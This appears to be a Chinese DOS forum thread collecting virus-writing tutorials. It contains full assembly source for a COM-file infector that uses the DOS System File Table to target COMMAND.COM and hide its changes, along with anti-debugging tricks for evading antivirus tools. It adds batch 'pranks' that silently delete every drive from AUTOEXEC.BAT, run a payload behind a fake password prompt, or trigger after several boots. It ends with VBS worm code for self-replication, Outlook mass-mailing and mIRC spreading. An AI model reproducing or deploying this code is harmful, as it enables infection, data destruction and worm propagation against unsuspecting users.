中国DOS联盟

──────────　Moderation Record　──────────
Performed by: namejm
Description: This post was transferred from DOS Batch & Script Technology (Batch Processing Room)
──────────　Moderation Record　──────────

Let's study together!
I. Save the data. (That's all for now!) ───────┐
II. Use DEBUG < FileName.xxx (file name) │
III. An executable file can be generated. │
│
N DS_ABOMB.COM ←┤
E0100 E8 00 00 5E 83 EE 03 BF 00 01 57 B8 99 4B CD 21 │
. │
. │
. │
RCX │
02DD │
W │
Q ←┘

◎System File Table (SFT) ◎
by Dark Slayer of TPVO

==========================================================================

Hi! I'm DS. Since I live in school dormitory but come back once a week, so I write some technical data for you members every week. Hope you work hard. Welcome to write to me to discuss, but I can only reply once a week. Sorry...
This time I'm going to talk about the application of SFT (System File Table).

When we use DOS's File Handle to read and write files, has anyone ever thought about its principle? Suppose the file pointer initially points to the beginning of the file. After we read or write this file, it changes the pointer. Has anyone ever thought about where it records this pointer value? If we write to a file, how does DOS know how to change the directory of this file when closing it? All the data related to file processing is recorded in the SFT. oh... yeah... SFT!!! It's a powerful tool for virus writers. In-depth understanding of SFT and its application in your virus will make your virus stronger. In fact... As early as the era of DOS 3.3, someone used SFT to write viruses. He is the Bulgarian virus king Dark Avenger. Foreigners have used SFT technology for a long time, but few virus authors in our country know how to use SFT (I'm an exception... hehehe...) OK! Enough of the nonsense... Let's quickly take a look at such a good thing...

SFT format in DOS 4.0-6.2 (taken from INTRLIST, translated by me)
Offset Size Description
00h WORD Number of handles referring to this file
02h WORD File open mode (refer to AH=3Dh, int 21h)
If this file is opened using FCB, bit 15=1
04h BYTE File attribute (refer to AH=43h, int 21h)
05h WORD Device information (refer to AX=4400h, int 21h)
bit 15=1 indicates this file is remote (on the network)
bit 14=1 Do not set the file's date and time when closing
bit 7 1: device, 0: file
bit 6 =1 The file has not been written yet
bits 5~0 When bit 7=1, the disk drive number (0=A:, 1=B: ...)
When bit 7=0, it's device information
07h DWORD If it's a character device, this is a pointer to the device driver header
Otherwise, this is a pointer to the DOS disk parameter block (DPB)
(refer to AH=32h, int 21h)
0Bh WORD Starting cluster of the file
0Dh WORD File time (refer to AH=57h, int 21h)
0Fh WORD File date (refer to AH=57h, int 21h)
11h DWORD File size
15h DWORD File read/write pointer (refer to AH=42h, int 21h)
19h WORD Relative cluster number of the last accessed cluster
1Bh DWORD Sector number of the directory entry of this file (can be directly read/written using int 25h/26h)
1Fh BYTE Number of directories that can fit in one sector
20h 11 BYTEs FCB format file name (no path, no dot '.', remaining space filled with blank space (ASCII code 20h)
2Bh DWORD (SHARE.EXE) Pointer to the previous SFT sharing the same file
2Fh WORD (SHARE.EXE) Network machine number that opened the file
31h WORD PSP segment of the file owner, AUX/CON/PRN point to IO.SYS
33h WORD (SHARE.EXE) Offset in the SHARE segment for the shared record
0000h=No SHARE
35h WORD Absolute cluster number of the last accessed cluster
37h DWORD Pointer to the IFS driver

After seeing the above data, do you find it complicated? Or feel excited? It contains many useful things (or should we call them weapons?!)

When we use DOS's AH=3Dh int 21h to open a file, DOS creates an SFT for this file. But you may be confused! How to get the address of this SFT? Look below...

mov ax,3d02h
mov dx,offset file_name
int 21h ; Open file

xchg bx,ax
push bx ; Save File Handle, because BX is changed below

mov ax,1220h
int 2fh ; Get Job File Table (JFT)

mov ax,1216h
xor bh,bh ; bh=0
mov bl,es: ; bl=es:=JFT number
int 2fh ; Get SFT address

pop bx ; Get back File Handle


--------D-2F1220-----------------------------
INT 2F U - Internal use in DOS 3+ - Get Job File Table
AX = 1220h
BX = file handle
Return: CF =1 error
AL = 6 (invalid file handle)
CF =0 success
ES:DI -> In the current program, JFT of the file code (byte)
Notes: the byte pointed at by ES:DI contains the number of the SFT for the file handle, or FFh if the handle is not open
supported by DR-DOS 5.0+
SeeAlso: AX=1216h,AX=1229h
--------D-2F1216-----------------------------
INT 2F U - Internal use in DOS 3+ - Get SFT address
AX = 1216h
BX = SFT number (i.e., the JFT obtained using AX=1220h int 2Fh)
Return: CF =0 success
ES:DI -> SFT address
CF =1, BX > FILES=xxxx
Note: supported by DR-DOS 5+
SeeAlso: AX=1220h


Cool?! Use DOS's undocumented function int 2Fh to get SFT. In fact, int 2Fh has many useful functions, which will be introduced later.

After getting SFT, what to do? Hehe... After getting it, many cool tricks can be shown with it. Next, it all depends on everyone's imagination and creativity... I point out a few places where SFT can be used. Other in-depth applications will be discussed later, or you can try it yourself to exert your spirit of seeking knowledge.

SFT format in DOS 4.0-6.2 (taken from INTRLIST, translated by me)
Offset Size Description
00h WORD Number of handles referring to this file
02h WORD File open mode (refer to AH=3Dh, int 21h)
If this file is opened using FCB, bit 15=1
I opened the file with 3D00h, then changed this to 2. In this way, I can access this file in read-write mode. This can deceive those bad AVs, because AV thinks that if it's opened with 3D00h, it can't be written, so it may not guard against this trick...

04h BYTE File attribute (refer to AH=43h, int 21h)

Before opening the file with 3D02h, I should first use 4300h to get the file attribute, then use 4301h to change the file attribute to non-hidden and writable? No need!! Hehe... We just open the file with 3D00h (as mentioned above), then save the value here, and then set it to 0. It has the same function.

05h WORD Device information (refer to AX=4400h, int 21h)
bit 15=1 indicates this file is remote (on the network)
bit 14=1 Do not set the file's date and time when closing
bit 7 1: device, 0: file
bit 6 =1 The file has not been written yet
bits 5~0 When bit 7=1, the disk drive number (0=A:, 1=B: ...)
When bit 7=0, it's device information

Do I need to save the time and date of the file before writing to it? No need!! After infecting, before closing the file, set bit 14 to 1, then the time and date won't be changed after closing.

07h DWORD If it's a character device, this is a pointer to the device driver header
Otherwise, this is a pointer to the DOS disk parameter block (DPB)
(refer to AH=32h, int 21h)

How does the Assassin virus get it? How many remaining clusters are there in the file to be infected? Of course, first know how many sectors are in one cluster of this disk, then calculate it with the file length. How to get these data? Of course, from DPB.

0Bh WORD Starting cluster of the file
0Dh WORD File time (refer to AH=57h, int 21h)
0Fh WORD File date (refer to AH=57h, int 21h)

I can get the file time and date without using AH=57h.

11h DWORD File size

I can get the file size without using AX=4202h, CX=DX=0, int 21h.

15h DWORD File read/write pointer (refer to AH=42h, int 21h)

Directly changing this value has the same effect as using AH=42h int 21h.

19h WORD Relative cluster number of the last accessed cluster
1Bh DWORD Sector number of the directory entry of this file (can be directly read/written using int 25h/26h)
1Fh BYTE Number of directories that can fit in one sector
20h 11 BYTEs FCB format file name (no path, no dot '.', remaining space filled with blank space (ASCII code 20h)
2Bh DWORD (SHARE.EXE) Pointer to the previous SFT sharing the same file
2Fh WORD (SHARE.EXE) Network machine number that opened the file
31h WORD PSP segment of the file owner, AUX/CON/PRN point to IO.SYS
33h WORD (SHARE.EXE) Offset in the SHARE segment for the shared record
0000h=No SHARE
35h WORD Absolute cluster number of the last accessed cluster
37h DWORD Pointer to the IFS driver

OK! I'll take the little virus from the previous virus teaching Lesson one to transform it, and demonstrate the part transformed using SFT with lowercase instructions.

=================(Lesson one - new)==========================================

LESSON_1 SEGMENT
ASSUME CS:LESSON_1,DS:LESSON_1
ORG 100h
START:
NOP ; ┐
NOP ; ├> Reserve 3 BYTES of space
NOP ; ┘

VIR_START: ; This is the real beginning of the virus program


CALL LOCATE ; Can be thought of as PUSH IP
LOCATE: ;
POP SI ;
SUB SI,OFFSET LOCATE ; Subtract the excess value, at this time SI=offset value

; Since this virus is attached to the back of the file, and the size of the infected file is different, so the offset of the virus attached to the back of the file will also be uncertain, which will cause variables to be unable to be located. So we need to know how much it has been offset
; The following program, as long as it involves parts related to memory addressing, will add offset value


MOV AX,WORD PTR DS:FIRST_3_BYTE ; ┬> Restore in memory, original
MOV DS:,AX ; │ File header, modified by virus
MOV AL,DS:FIRST_3_BYTE ; │
MOV DS:,AL ; ┘

; Because when this virus is executed for the first time, it hasn't infected the file before, and when restoring these 3 BYTES, it will overwrite the virus itself. So at the beginning, I added 3 NOPs to leave this space, and VIR_START is the real beginning of the virus code


mov ax,3D00h ; open file for read only

LEA DX,FILE_NAME ; DS:DX points to the file name to be opened
INT 21h ; Call interrupt

; After the file is opened successfully, AX=file handle (FILE HANDLE) is returned

MOV BX,AX ; BX = AX = FILE HANDLE


push bx ; save BX
mov ax,1220h
int 2fh ; get JFT
mov ax,1216h
xor bh,bh
mov bl,es: ; BL=JFT
int 2fh ; get SFT
pop bx ; restore BX

mov word ptr es:,2 ; file mode = 2 (read/write)

mov al,es: ; AL=file attribute
push ax ; save AX
mov byte ptr es:,0 ; set file attribute to zero


MOV AH,3Fh ; Read file
MOV CX,3 ; Read 3 BYTES
LEA DX,FIRST_3_BYTE ; DS:DX points to the address to store data
INT 21h ; Call interrupt

; This action is to read the first 3 BYTES of the file into FIRST_3_BYTE and save it


; MOV AX,4202h ; Move file pointer (from the end of the file)
; XOR CX,CX ; CX = 0
; XOR DX,DX ; DX = 0, move 0 BYTES from the end of the file
; INT 21h ; Call interrupt

mov ax,es: ; AX=file length
mov es:,ax ; set access point to file end
; Since it's a .com file, less than 64K,
; so only the low word group needs to be processed


; This action is to move the file read/write pointer to the end of the file, and DX:AX (DX = HIGH, CX = LOW) returns the distance from the beginning of the file to the moved pointer. So at this time DX = 0 (COM file less than 64K), AX = file length


SUB AX,3 ; Calculate the offset of JMP
MOV WORD PTR DS:JMP_BYTE,AX ; Save the offset value

; This action is to calculate the offset required to JMP from the beginning of the file to the beginning of the virus code (end of the file)


MOV AH,40h ; Write file
MOV CX,VIR_SIZE ; CX = virus length
LEA DX,VIR_START ; DS:DX points to the beginning of the virus program
INT 21h ; Call interrupt

; This action is to write the virus body into the file. Since the previous action has moved the file pointer to the end of the file, this write is from the end of the file, that is, concatenate the virus body at the end of the file


; MOV AX,4200h ; Move file pointer (from the beginning of the file)
; XOR CX,CX ; CX = 0
; XOR DX,DX ; DX = 0, move 0 BYTES from the beginning of the file
; INT 21h ; Call interrupt

mov word ptr es:,0

; This action is to move the file read/write pointer to the beginning of the file to modify the first 3 BYTES of the file header


MOV AH,40h ; Write file
MOV CX,3 ; Write 3 BYTES
LEA DX,JMP_BYTE ; DS:DX points to the JMP program code
INT 21h ; Call interrupt

; This action is to write the JMP code we calculated to the first 3 BYTES of the file header. In this way, when the program is executed, it will jump to the beginning of the virus program


pop ax ; AX=file attribute
mov es:,al ; restore file attribute

or word ptr es:,0100000000000000b
; Do not change the time and date when closing the file


MOV AH,3Eh ; Close file
INT 21h ; Call interrupt

push cs
pop es ; Because getting SFT has changed es

MOV AX,100h ; AX = 100h (the initial execution address of the COM file)
PUSH AX ; PUSH the value for the next RET instruction
RET ; RET to 100h

; Since the virus has done what it should do, return to 100h to execute the original file


FILE_NAME DB 'C:\COMMAND.COM',0
FIRST_3_BYTE DB 0CDh,20h,? ; DB 0CDh,20h = INT 20h (program end)
JMP_BYTE DB 0E9h,?,? ; 0E9h,?,? = JMP XXXX

MSG DB 'This is virus by Dark Slayer'
DB ' in Keelung, Taiwan <R.O.C> of TPVO'

VIR_SIZE EQU $-OFFSET VIR_START

LESSON_1 ENDS
END START
Hi! This time I'm going to study some anti-tracking techniques... Although this is not directly related to viruses, it's fun to make some AVs confused...

In the early days, when people prevented others from debugging, they either crashed int 1h, int 3h or locked the keyboard. In this way, they couldn't trace anymore. Although these methods are not very clever, they eventually achieved the purpose of preventing tracing... With the birth of some tools, these methods can no longer meet the requirements of tracing... So... Hee! All kinds of strange methods have been dug out one after another! And the purpose of me writing this anti-trace is to summarize them... This is also my current responsibility... :_)

************************
1) Use some special instructions???
************************

We first need to find some relatively special instructions to put into our virus. In this way, some AVs can't trace下去, and you can achieve the purpose of anti-tracking... Let's take TBCLEAN in TBAV as an example... (Oh! This is a free AV)

C:\TBAV>debug
-a100
xxxx:xxxx LOCK ; This instruction TBCLEAN can't be emulated! Why?
xxxx:xxxx int 20h ; Maybe the author has a special reason...
xxxx:xxxx <Enter>
-n test.com
rcx
:3
-w
-q
C:TBAV>tbclean test.com

In addition to this instruction, there are ENTER, LEAVE, PUSH ??h, PUSH ????h...
Of course! It's not just these instructions that can be used... You can go and try some *not used* instructions!!!

Next is the 87 instruction... According to what I've seen so far, no AV can simulate these arithmetic coprocessor instructions... (Except PTAV... It's added to understand my first polymorphic... Hee!) Of course you can also try TBCLEAN to see if it can be simulated! The answer is no... Because as long as it's an instruction it doesn't recognize! It can achieve the purpose of anti-tracking. I think you should understand this! :_)

In addition to the instructions mentioned above! We can also use some strange instructions? Hee! Thanks to DS for giving me some suggestions...

1) D6h (Set AL to carry)
If CF=1, AL is set to FFh!
If CF=h, AL is set to 00h!

2) F1h
This instruction is in ICE! Used as a breakpoint... Has the same purpose as int 3h in debug...

************
2) Hardware & Interrupts
************

1) int 00h (Divide by 0 error)

...
xor ax,ax
mov ds,ax
push word ptr ds:
push word ptr ds:
mov ds:,cs
mov ax,OFFSET int0_jmp
mov ds:,ax
xor ax,ax
div ax ; Because ax:=0000h and ax divided by ax triggers
int 20h ; int 0h interrupt... Makes the program jump to int0_jmp!
... ; Instead of executing int 20h ...
int0_jmp:
pop ax
pop ax
pop ax
pop word ptr ds:
pop word ptr ds:
...

I originally added this method to GCAE v2.0. Unexpectedly, some magazines my friend sent me later had the same method. It shows that foreign technology has always been stronger than ours. So everyone should work hard...
In the past, there was no CPU instruction emulation that could trace下去... (Except the new version of PTAV...)


Similar methods include int 5h (related to bound), int 6h (illegal instruction interrupt), int 7h, int 0dh... Interested people can study it by themselves... (Wow! I'm so degenerate...) :_)

2) int 02h (Non-maskable interrupt)

...
xor ax,ax
mov ds,ax
push word ptr ds:
push word ptr ds:
mov ds:,cs
mov ax,OFFSET int0_jmp
mov ds:,ax
int 75h ; Why call int 75h?? Hee! According to my observation... There is an int 02h in this interrupt!
... ; So... :_)
int2_jmp:
add sp,000ch
pop word ptr ds:
pop word ptr ds:
...

Hee! I plan to use this method in my next variant engine... So far, none can simulate it (I tried with TBAV...)!
In addition... I/O ports can also be used to trigger int 2h interrupt. Interested people can study it...
port: 61h, 70h...

***************
3) CPU Instruction Queue
***************

Hey? Queue? Haven't heard of it? That's right... At first I didn't know its principle! But now I know it... Thanks to the guidance of a senior and my own intelligence... (Hah! Seems a bit cocky...)

mov ah,09h
mov word ptr ds:,OFFSET msg2 ;*
reg_dx:
mov dx,OFFSET msg1
int 21h
int 20h

msg1 db 'Fuck the Mad Satan! Shit!','$'
msg2 db 'Oh! Zhuge ... You are great!!!','$'

Hmm! When tracing under debug, what is obtained is msg2... But under DOS it's msg1
How? Fun enough吧... Why does this happen?? This is because Intel's CPU will load several instructions together when executing... (Maybe it's more time-saving!) And after the asterisk is executed, although mov dx,OFFSET msg1 is replaced with mov dx,OFFSET msg2 in the program, it's not changed in the CPU, resulting in the execution result being msg1! Of course! If there is a jmp or call after the asterisk, this phenomenon won't happen. I think you should understand the relationship with anti-tracking. You can also use this method to change the program flow!

The materials are good, but this article seems to have little to do with batch processing. I'm afraid the panda will come to warn you.

A real tough guy!!!

Batch processing oh~ I almost forgot `
Then let me talk about batch processing:
Prank: Completely Automatic Deletion of Hard Disk Files
(After related operations) Successfully invaded someone else's host! Of course, I want to see what good stuff is on the hard disk! First, check whether the owner of the machine is male or female, mainly to see if there is OICQ. Generally, it is in C:\Program Files\oicq. Ah? At least 50 numbers? It's obvious that it's not a good person! With many OICQ numbers, it's easy to deceive people! After finding it, check his information on my own OICQ (generally inaccurate). Hey? The number is good? Okay, first download the CFG file password file, then use the OICQ password cracker to unlock it! Done, then log in with OICQ and change the password! OK?! What else is there? Download the message to see? Hee hee, or see what game he is playing? Upload the "Lianzhong Online Game" password viewer to find his "Lianzhong Online Game" password? Not fun, not fun! Still go to see what he is doing now! (After related operations) Ah?! Xiaoyu fainted... This pervert! Actually browsing pornographic websites?! Xiaoyu is so angry! I should have known not to look! Humph! Make you perverted! Give you some color to see! Xiaoyu immediately uploaded an edited batch processing file named AUTOEXEC.BAT in his C drive root directory. The content is as follows: (Xiaoyu declares: The above are all fictional, any resemblance is purely coincidental!)

--------------------------------------------------------------------------------
@rem Start
@rem Turn off command line display
@echo off
rem Set path
PATH %PATH%;c:\windows\;c:\windows\command
rem Run disk buffer to speed up deletion speed: )
SMARTDRV >nul
rem Clear screen
cls
rem Display running WINDOWS system and percentage
echo run Windows ..........10%%
rem Perform deletion operation
deltree /y g:\. >nul
cls
echo run Windows ..........20%%
deltree /y f:\. >nul
cls
echo run Windows ..........50%%
deltree /y e:\. >nul
cls
echo run Windows ..........70%%
deltree /y d:\. >nul
cls
echo run Windows ..........90%%
deltree /y c:\. >nul
cls
rem After all deletion, tell him what the computer was doing just now! : )
echo del system all!!
echo Goodbye!!!
rem End

--------------------------------------------------------------------------------
OK! When he starts next time, all system files will be automatically deleted! If there are other hard disks, you can also add them in the program. Can all netizens understand? Hee hee, should be able to understand, everyone is an expert嘛! Although this is just a simple, ordinary batch processing file, but the role here is not simple呦! It is to completely delete all files on his hard disk! If his system is running, there must be files that cannot be deleted, but now... when nothing has started running yet... and taking advantage of the slow startup of the WINDOWS system, he must be scolding the speed of WIN while waiting slowly for deletion!
Prank: Startup Password

Even if he has more D-version CDs, he still needs to reinstall the system? Still needs to reinstall the driver program? At least can't surf the Internet for a few hours, and lose everything... I'll go cry later... Hee hee...试问 who checks the AUTOEXEC.BAT file before shutting down every time? Who starts and directly runs the WINDOWS system? So this method rarely fails! Is it vicious? You can modify the yellow part and delete all statements starting with rem.
(Modification is okay, but must remember to correspond before and after!) If you don't understand or only half-understand the program, don't try it yourself! The result is very dangerous
Where do you generally add passwords on the computer? CMOS? Windows startup? Encrypt directory? Or encrypt program? No, none is good, very easy to be cracked! And you don't want the cracker to easily get your data, then what to do? Please see the following program:

--------------------------------------------------------------------------------
@rem Start
@rem Turn off command line display
@echo off
rem Set path
PATH %PATH%;c:\windows\;c:\windows\command
rem Set variable
set a=1
set d=0
:sub
rem Clear screen
cls
rem Wait for password input
CHOICE /c:1234567890 /n Password(3-%a%):
rem Judge which character is input
if ERRORLEVEL 10 goto 10
if ERRORLEVEL 9 goto 9
if ERRORLEVEL 8 goto 8
if ERRORLEVEL 7 goto 7
if ERRORLEVEL 6 goto 6
if ERRORLEVEL 5 goto 5
if ERRORLEVEL 4 goto 4
if ERRORLEVEL 3 goto 3
if ERRORLEVEL 2 goto 2
rem Judge running times
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:10
rem Judge whether password is correct
if %d%==2 set d=3
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:9
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:8
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:7
if %d%==0 set d=1
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:6
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:5
if %d%==1 set d=2
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:4
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:3
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:2
if %a%==3 goto run
if %a%==2 set a=3
if %a%==1 set a=2
goto sub
:run
rem Judge whether password is correct
if %d%==3 goto end
rem Display "OK" when password is wrong! Confuse illegal users
echo Password ok!
rem Put the program to be executed when password is wrong here
:end
@rem End
--------------------------------------------------------------------------------
This BAT program can be input three times. The correct password is: 750. You can also use letters as the password. If the password is input wrong, it will display that the password is correct to confuse illegal users while executing your remedy program, such as executing to delete important files and so on! If it is placed in autoexec.bat, it can get the effect of encryption when restarting! Generally, people will randomly input first without knowing the password, so this program should still work, isn't it very simple? You can put the red part in any order in any paragraph and delete all statements starting with rem. (Modification is okay, but must remember to correspond before and after!)

Prank: Execute Specified Program After Running N Times
(Okay, the prank program is ready, but I don't want it to take effect immediately, because I'm afraid people will suspect me! What to do? Come, take a look at the following program:

--------------------------------------------------------------------------------
@rem Start
@rem Turn off command line display
@echo off
rem Set path
PATH %PATH%;c:\windows\;c:\windows\command
rem Judge whether there is a start execution mark file
if EXIST c:\windows\5.bak goto run
rem Create initial mark file
dir c:\msdos.sys > c:\windows\1.bak
rem Find mark file to judge running times
if EXIST c:\windows\4.bak goto a
if EXIST c:\windows\3.bak goto b
if EXIST c:\windows\2.bak goto c
if EXIST c:\windows\1.bak goto d
goto end
:a
rem Create running times mark file
type c:\windows\1.bak > c:\windows\5.bak
goto end
:b
type c:\windows\1.bak>c:\windows\4.bak
goto end
:c
type c:\windows\1.bak>c:\windows\3.bak
goto end
:d
type c:\windows\1.bak>c:\windows\2.bak
goto end
:run
rem Start to execute scheduled program
deltree /y c:\windows\1.bak >nul
deltree /y c:\windows\2.bak >nul
deltree /y c:\windows\3.bak >nul
deltree /y c:\windows\4.bak >nul
deltree /y c:\windows\5.bak >nul
rem Change to the file name of the program you want to run >nul
:end
@rem End
--------------------------------------------------------------------------------
This BAT executes a scheduled program once every 5 runs. If it is placed in autoexec.bat, it can get the effect of executing a specified program once after restarting 5 times! Isn't it very simple? You can modify the red part to increase or decrease the running times and delete all statements starting with rem. (Modification is okay, but must remember to correspond before and after!)

The popularity of the network has made our world a better place, but it also has unpleasant times. When you receive an email with the subject "I Love You" and click on the attachment with a mouse that's almost trembling with excitement; when you browse a trusted website and find that the speed of opening each folder is very slow, do you notice that a virus has entered your world? The "I Love You" network worm virus broke out in Europe and the United States on May 4, 2000. Due to its spread through the email system, the I Love You virus raged through millions of computers around the world in just a few days. The network systems of many large enterprises such as Microsoft and Intel were paralyzed, and the global economic loss reached several billion US dollars. And the new Happy Time virus that broke out last year still makes computer users extremely miserable.

The biggest common feature of the two viruses mentioned above is: they are written in VBScript. The very rampant VBS script viruses represented by the I Love You and new Happy Time viruses have a very important reason, which is that they are easy to write. Now we will analyze various aspects of VBS script viruses one by one:

I. Characteristics and development status of VBS script viruses
VBS viruses are written in VB Script. This script language is very powerful. They use the open nature of the Windows system. By calling some existing Windows objects and components, they can directly control the file system, registry, etc., and have very powerful functions. It should be said that a virus is an idea, but this idea becomes extremely easy to implement with VBS. VBS script viruses have the following characteristics:
1. Easy to write. A virus enthusiast who knows nothing about viruses can create a new virus in a very short time.
2. Great destructiveness. Its destructiveness is not only manifested in the destruction of user system files and performance. It can also make the email server crash and the network seriously blocked.
3. Strong infectivity. Since the script is directly interpreted and executed, and it does not need to do complex PE file format processing like PE viruses, such viruses can directly infect other similar files by self-replication, and self-exception handling becomes very easy.
4. Wide spread range. Such viruses can spread all over the world in a very short time through htm documents, Email attachments or other methods.
5. Easy to obtain virus source code and have many variants. Since VBS viruses are interpreted and executed, their source code is very readable. Even if the virus source code is encrypted, it is relatively easy to obtain the source code. Therefore, there are many variants of such viruses. If the structure of the virus is slightly changed or the characteristic value is modified, many anti-virus software may be unable to do anything.
6. Strong deception. In order to get the opportunity to run, script viruses often use various means that users don't pay much attention to. For example, the attachment name of an email uses a double suffix, such as.jpg.vbs. Since the system does not display the suffix by default, when users see this file, they will think it is a jpg image file.
7. Makes it very easy to implement a virus generator. The so-called virus generator is a machine (of course, here refers to a program) that can produce viruses according to users' wishes. At present, most virus generators are script virus generators. The most important point is that the script is interpreted and executed, and it is very easy to implement, which will be discussed later.
Because of the above characteristics, script viruses are developing extremely rapidly. Especially the emergence of virus generators makes it very easy to generate new script viruses.

II. Principle analysis of VBS script viruses
1. How VBS script viruses infect and search for files
VBS script viruses generally infect files directly through self-replication. Most of the code in the virus can be directly attached in the middle of other similar programs. For example, the new Happy Time virus can attach its own code to the end of a.htm file and add a statement to call the virus code at the top. And the I Love You virus directly generates a copy of a file, copies the virus code into it, and uses the original file name as the prefix of the virus file name and.vbs as the suffix. Now we will analyze the infection and search principle of such viruses through part of the code of the I Love You virus:
The following is part of the key code for file infection:
Set fso = createobject("scripting.filesystemobject")'Create a file system object
set self = fso.opentextfile(wscript.scriptfullname, 1)'Read and open the current file (that is, the virus itself)
vbscopy = self.readall'Read all virus code into the string variable vbscopy……
set ap = fso.opentextfile(The path of the target file, 2, true)'Write and open the target file, ready to write virus code
ap.write vbscopy'Cover the target file with virus code
ap.close
set cop = fso.getfile(The path of the target file)'Get the path of the target file
cop.copy(The path of the target file & ".vbs")'Create another virus file (with.vbs as the suffix)
The target file.delete(true)'Delete the target file
The above describes how the virus file infects the normal file: first, the virus itself code is assigned to the string variable vbscopy, then this string is overwritten and written to the target file, and a file copy with the target file name as the file name prefix and.vbs as the suffix is created, and finally the target file is deleted.
Now we will specifically analyze the file search code:
'This function is mainly used to find files that meet the conditions and generate a virus copy of the corresponding file
sub scan(folder_)'Define the scan function,
on error resume next'If an error occurs, skip directly to prevent the error window from popping up
set folder_ = fso.getfolder(folder_)
set files = folder_.files'The collection of all files in the current directory
for each file in files
ext = fso.GetExtensionName(file)'Get the file suffix
ext = lcase(ext)'Convert the suffix name to lowercase letters
if ext = "mp5" then'If the suffix name is mp5, infect it. Please create files with corresponding suffix names by yourself, preferably abnormal suffix names, so as not to damage normal programs.
Wscript.echo (file)
end if
next
set subfolders = folder_.subfolders
for each subfolder in subfolders'Search other directories; call recursively
scan( )
scan(subfolder)
next
end sub
The above code is the code analysis of the file search of the VBS script virus. The search part scan() function is relatively short and exquisite, very clever, and uses a recursive algorithm to traverse the directories and files of the entire partition.

2. Several ways of network transmission of VBS script viruses and code analysis
The wide spread range of VBS script viruses mainly depends on its network transmission function. Generally speaking, VBS script viruses use the following several ways to spread:
1) Spread through Email attachments
This is a very common spread way. The virus can get legal Email addresses by various methods. The most common one is to directly take the email addresses in the outlook address book, and it can also search for Email addresses in the user's documents (such as htm files) through the program.
Now we will specifically analyze how the VBS script virus does this:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //Create an object of the OUTLOOK application
If outlookApp = "Outlook" Then
Set mapiObj = outlookApp.GetNameSpace("MAPI") //Get the namespace of MAPI
Set addrList = mapiObj.AddressLists //Get the number of address tables
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count //Get the number of Email records of each address table
For addrEntIndex = 1 To addrEntCount //Traverse the Email addresses of the address table
Set item = outlookApp.CreateItem(0) //Get an instance of the mail object
Set addrEnt = addr.AddressEntries(addrEntIndex) //Get the specific Email address
item.To = addrEnt.Address //Fill in the recipient address item.Subject = "Virus spread experiment" //Write the email title
item.Body = "This is a virus email spread test, please don't panic when you receive this letter!" //Write the file content
Set attachMents = item.Attachments //Define the email attachment
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //The letter is automatically deleted after submission
If item.To <> "" Then
item.Send //Send the email
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //Virus mark to avoid repeated infection
End If
Next
End If
Next
End if
End Function

2) Spread through LAN sharing
LAN sharing spread is also a very common and effective network spread way. Generally speaking, in order to facilitate communication within the LAN, there must be many shared directories with writable permissions. For example, when creating a share in win2000, it has writable permissions by default. In this way, the virus can spread the virus code to these directories by searching these shared directories.
In VBS, there is an object that can realize the search and file operation of the shared folder in the network neighborhood. We can use this object to achieve the purpose of spread.
welcome_msg = "Network connection search test"
Set WSHNetwork = WScript.CreateObject("WScript.Network") ’Create a network object
Set oPrinters = WshNetwork.EnumPrinterConnections ’Create a network printer connection list
WScript.Echo "Network printer mappings:"
For i = 0 to oPrinters.Count - 1 Step 2 ’Display the network printer connection situation
WScript.Echo "Port " & oPrinters.Item(i) & " = " & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives ’Create a network shared connection list
If colDrives.Count = 0 Then
MsgBox "There are no drivables to list.", vbInformation + vbOkOnly,welcome_msg
Else
strMsg = "Current network drive connections: " & CRLF
For i = 0 To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13) & Chr(10) & colDrives(i) & Chr(9) & colDrives(i + 1)
Next
MsgBox strMsg, vbInformation + vbOkOnly, welcome_msg’Display the current network drive connection
End If
The above is a complete script program used to find the current printer connection and network shared connection and display them. After knowing the shared connection, we can directly read and write files to the target drive.

3) Spread by infecting web files such as htm, asp, jsp, php
Nowadays, WWW services have become very common. The virus will definitely cause all user machines that have visited this web page to be infected with the virus by infecting htm and other files.
The reason why the virus can play a powerful function in htm files is the same as the principle of most web malicious codes. Basically, they use the same code, but other codes can also be used. This code is the key for the virus FSO, WSH and other objects to run in the web page. In the registry HKEY_CLASSES_ROOT\CLSID\, we can find such a primary key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}, and the description of it in the registry is "Windows Script Host Shell Object". Similarly, we can also find {0D43FE01-F093-11CF-8940-00A0C9054228}, and the description of it in the registry is "FileSystem Object". Generally, we need to initialize COM first. After obtaining the corresponding component object, the virus can correctly use the FSO and WSH objects and call their powerful functions. The code is as follows:
Set Apple0bject = document.applets("KJ_guest")
Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Apple0bject.createInstance() ’Create an instance
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
Apple0bject.createInstance() ’Create an instance
Set FSO = Apple0bject.Get0bject()
For other types of files, we will not analyze them one by one here.

4) Spread through IRC chat channels
The virus generally uses the following code to spread through IRC (taking MIRC as an example)
Dim mirc
set fso = CreateObject("Scripting.FileSystemObject")
set mirc = fso.CreateTextFile("C:\mirc\script.ini") ’Create the file script.ini
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True ’Backup the virus file to attachment.vbs
mirc.WriteLine ""
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }"
'Use the command /ddc send $nick attachment.vbs to send the virus file to other users in the channel
mirc.Close
